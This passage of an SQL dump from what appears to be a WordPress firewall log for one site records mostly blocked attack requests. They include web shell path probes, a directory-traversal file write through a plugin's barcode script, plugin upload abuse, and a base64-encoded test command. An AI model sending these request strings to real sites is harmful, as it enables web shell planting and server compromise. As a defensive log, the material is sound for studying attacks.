User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQva2luZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11276,1673918909.871371,1673918908.776100,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/x.php?1=system','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQveC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11277,1673918908.628000,1673918907.719400,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=..%2F..%2F..%2Fx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4veC5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL2luY2x1ZGVzL2JhcmNvZGUucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(11278,1673918906.896297,1673918905.890800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FicnV6aS5waHA0\",\"category\":\"brute-force\",\"ssl\":1}'),(11279,1673918905.669260,1673918904.290500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11280,1673918904.040350,1673918902.921000,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy90eXBlaHViL2N1c3RvbS9hNTdiemU4OTMxLy5fX2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11281,1673918902.748569,1673918902.064800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11282,1673918896.508409,1673918895.561600,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC9maWxlcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11283,1673918895.399986,1673918894.613500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(11284,1673918894.199946,1673918893.214200,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11285,1673918892.915401,1673918892.042500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/upload.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11286,1673918890.362699,1673918889.421600,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11287,1673918888.843651,1673918887.885500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11288,1673918887.508147,1673918886.415000,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9rYXN3YXJhL2ZvbnRzX2ljb24vYTU3YnplODkzMS8uX19hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11289,1673918885.988546,1673918885.021800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php?action=uploadFontIcon','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11290,1673918884.861524,1673918884.195500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11291,1673918884.029907,1673918883.125500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/wp-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL3dwLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11292,1673918882.939302,1673918881.866500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11293,1673918882.909774,1673918882.014200,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11294,1673918881.764138,1673918880.539700,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11295,1673918880.138126,1673918879.137800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11296,1673918878.169552,1673918877.414200,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9JT3B0aW1pemVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11297,1673918876.798036,1673918875.400900,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11298,1673918875.211727,1673918874.546500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9zYXZlcG5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11299,1673919486.301004,1673919484.876800,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11300,1673922318.948997,1673922318.758800,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=ZWNobyAidmRhZHNmZ2RmIjs%3D',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2NvbXBvbmVudHMvY29tX2puZXdzL2luY2x1ZGVzL29wZW5mbGFzaGNoYXJ0L3RtcC11cGxvYWQtaW1hZ2VzLzI1NXRlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11301,1673922680.782278,1673922680.647600,'\0\0\0\0\0\0\0\0\0\0��&6Y�',0,200,0,0,0,'https://dailyjolly.co.uk/sandbox/wp-admin/install.php',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; 